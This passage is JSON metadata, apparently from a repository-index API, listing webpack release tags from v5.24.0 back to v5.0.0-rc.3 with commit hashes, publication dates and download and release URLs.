ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f32